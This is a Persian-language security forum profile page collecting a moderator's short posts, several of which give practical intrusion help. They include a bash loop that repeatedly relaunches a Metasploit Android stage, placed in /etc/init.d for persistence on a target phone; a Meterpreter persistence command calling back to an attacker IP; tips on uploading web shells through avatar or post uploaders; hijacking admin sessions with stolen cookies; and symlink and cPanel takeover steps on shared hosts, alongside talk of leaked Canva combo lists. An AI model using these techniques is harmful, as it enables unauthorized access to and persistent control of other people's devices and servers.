رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

0x3a

Moderator
  • تعداد ارسال ها

    417
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    11
  • Country

    آنگولا

تمامی مطالب نوشته شده توسط 0x3a

  1. 0x3a

    Devil sender v3.2

    سعی کنید Open Source کار کنید قطعا سورس بهتر از لینک virustotal هست
  2. 0x3a

    پیدا نشدن آیپی سرور

    سلام روش منسوخ شده و میبایست از روش جدید استفاده کنید
  3. 0x3a

    واقعیت vs تصورات😂😂

    دوست عزیز اینجا یک فروم علمی هست و از ارسال مطالب فکاهی خودداری کنید اخطار اول اخطار بعدی منجر به محدودیت فعالیت های شما می شود
  4. 0x3a

    دیتابیس سایت Canva.com

    سلام کمبو معمولا به صورت email:password هستند
  5. 0x3a

    Target Trainings

    سلام @Stubborn باید خدمتتون عرض کنم قبل از انتشار یک مطلب حتما از صحت اون مطلب مطمئن بشید از تمام این لیستی که گذاشتید یه دونه تارگتم درنمیاد چون لیستتون مال 2009 هست و بدرد نمیخوره از شما به عنوان یه یوزر حرفه ای انتظار هست که موارد به این سادگی رو رعایت کنید
  6. سلام دوست عزیز SSI در صفحات HTML با محتوای دینامیک رخ می دهد و در سمت وب سرور پردازش می شود اما هر دو جز دسته Code Injection هستند بخاطر همین شباهت هست
  7. 0x3a

    INZ APKTool

    راهی هست که برای امنیت سورس برنامه فرایند دیکامپایل رو سخت تر کرد؟
  8. 0x3a

    web shell root access

    از لینک زیر استفاده کن مشاهده لینک
  9. 0x3a

    Error Based Sql injection

    سلام اولا که در جای مناسب برای پرسیدن سوال تاپیک باز کنید و سوالتونو مثل همه خلق الله بپرسید دوما که شما اگر کوکی ادمین داشته باشید اگر لاگ اوت نکنه شما میتونید با افزونه های کوکی منیجر توی مرورگرای مختلف کوکی جایگزین کنید و به عنوان مدیریت وارد بشید
  10. 0x3a

    درخواست لینک سایت ها با دورک

    inurl:/register_from_website site:edu
  11. 0x3a

    web shell root access

    سوال اولتو دقیق متوجه نشدم اما برای سوال دوم یوزر و پس مستقیما نه اما با متود ریست پسورد cp میتونی اکسس بگیری
  12. 0x3a

    اپلود شل

    وبلاگ طور که فرمودید اگر ادیتور پست قابلیت اضافه کردن عکس داشت میتونید از اون طریق شلتونو آپ کنید یا از قسمت پروفایل ، عکس آواتار رو تغییر بدید خلاصه بگرد ببین کجا اپلودر هست حالا اگر از پنلت عکس بدی یا بیشتر توضیح بدی بیشترم میتونیم کمکت کنیم
  13. بله ولی کمی متفاوت تر هست کد زیر رو توی یک فایل با پسوند sh قرار بده اپلود کن روی تارگت اندرویدت #!/bin/bash while : do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 20 done اسکرپیت رو با دستور uplaod file.sh به حافظه تارگتت انتقال بده 2 مسئله اینجا هست اگر تارگتت روت هست فایلتو توی مسیر /etc/init.d قرار بده که بعد هربار ریبوت فایل اجرا بشه اگر نیست هر جا اجرا کنی مهم نیست فقط نکته اینجاست که بعد ریبوت دسترسی از بین میره بعد از اجرا هم 2 مسئله هست اگر از استاتیک ای پی استفاده می کنی مشکلی نیست اگر روترت ریبوت بشه ولی اگر نداری اگر تارگتت ریبوت نکنه ولی روترت ریبوت بشه باز دسترسیتو از دست میدی موفق باشی
  14. سلام برای ماندگاری دسترسی باید از سرویس Meterpreter Persistence استفاده کنید ، با اینکار یک فایل درون Startup سیستم قربانی قرار داده می شود که باعث می شود طبق تعریفی که به آن در هنگام ساخت دادید به شما درخواست برای کانکت شدن ارسال کند meterpreter > run persistence -X -i 3 -p 4444 -r YOUR_IP سوییچ -X باعث می شود هرگاه سیستم قربانی روشن شد اسکریپت اجرا شود سوییچ -i برای تعیین فاصله زمانی بین هر درخواست برای کانکت شدن است سوییچ های -p و -r هم که مشخصا برای تعیین ip و port هست شما فقط کافیست هر زمان که نیاز به اتصال دوباره داشتید listener خود را روی پورتی که مشخص کردید ران کنید تا دوباره به تارگت متصل شوید موفق باشید
  15. 0x3a

    شروع و ورود به دنیای هک

    سلام بنظرم برای شروع کتاب Owasp top 10 و Web hacking 101 که هر دو pdf موجود در نت هست رو مطالعه کنید سطحتون ارتقا پیدا می کنه
  16. 0x3a

    مشکل در نفوذ به سایت با باگ xss

    سلام دوست عزیز لینک زیر مربوط به بایپس هایی هست که Owasp برای xss ارائه کرده میتونی چک کنی لینک
  17. 0x3a

    سوال امنیتی از دوستان کاربلد

    سلام خدمت دوست عزیز جواب بله هست از طریق پنل وردپرس می توان روی هاست شما شل اپلود کرد و از طریق شل هم سرورو مورد نفوذ قرار داد و به سایر هاست های روی سرور هم دسترسی پیدا کرد
  18. دوست عزیز فرآیند آموزش کلی هست چنانچه درخواست آموزش درخواست برای سایر نسخه ها دارید می توانید در تاپیک جداگانه درخواست خود را مطرح کنید در ضمن این نوع آموزش ها کلی هستند و فکر نکنم در سایر نسخه ها متفاوت باشد موفق باشید
  19. 0x3a

    پروکسی اسپانسر

    سلام برای ثبت کانال اسپانسری پروکسی می بایست از طریق ربات @MTProxybot اقدام کنید ! ربات رسمی تلگرام هست که شما می توانید از آن برای مدیریت پروکسی ها استفاده کنید
  20. 0x3a

    مباحث Steganography

    سلام اول از همه تشکر بابت پیوست و توضیحات دوم خواستم بگم که اگر مقدور هست چند تا چلنج استگانوگرافی حل کنید با همین ابزارهایی که گفته شد ما هم روش کار و ... یاد بگیریم ممنون
  21. در اسرع وقت یک آموزش تصویری در این زمینه تهیه خواهد شد
  22. 0x3a

    Wordlist

    بانکهای ایرانی هم همچین قابلیتی دارند چه رسد به ویزاکارت و مسترکارت
  23. گوگل ریکپچا تا جایی که یادم هست برای ورژن ۲ بایپس اومده بود ! و مورد اینکه شما اگر به بهترین شکل از wp-login.php محافظت کنید باز هم از طریق xmlrpc.php ( که برای مدیریت پنل از طریق گوشی هست ) هم ممکن هست دچار اتک شوید موفق باشید
  24. اولین موردی که همیشه باید بررسی کنید چک کردن آیا Cagefs روی سرور نصب شده یا نه ؟ زیرا Cagefs باعث ایزوله کردن یوزر می شود و صد البته اجازه Symlinl نمی دهد ! دومین چیزی که باید بررسی کنید این که آیا می توانید دسترسی به Cpanel داشته باشید یا نه ؟ که هم می توانید کرک کنید ! یا رمز کانفیگ دیتابیس را امتحان کنید و یا از روش بازگردانی پسورد استفاده کنید ( تغییر ایمیل بازگردانی که قبلا در فروم قرار گرفته ) سوم دسترسی به اجرای دستورات یا دسترسی Cgi چه از طریق پرل چه از طریق پایتون دارید یا نه ؟ چهارم اگر به فایل passwd دسترسی دارید یک یوزر را امتحانی سیملینک کنید و اگر با اروری مواجه شدید اطلاع بدهید که چگونه اروری هست یعنی 404 ، 403 و ... بنده چند مورد اولیه ی خیلی ساده و سطحی خدمت شما عرض کردم که شما این موارد را چک کنید اطلاع دهید و بفرمایید که وضعیت به چه صورت هست ! چون هر سروری یک مدیر انسان دارد که همه ی انسانها سلیقه یکسان ندارند و ۱۰۰% کانفیگ های مختلفی روی سرورهای خود پیاده سازی می کنند پس با این اطلاعاتی که عرض کردید چیز زیادی دستگیر نخواهد شد و من الله توفیق

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...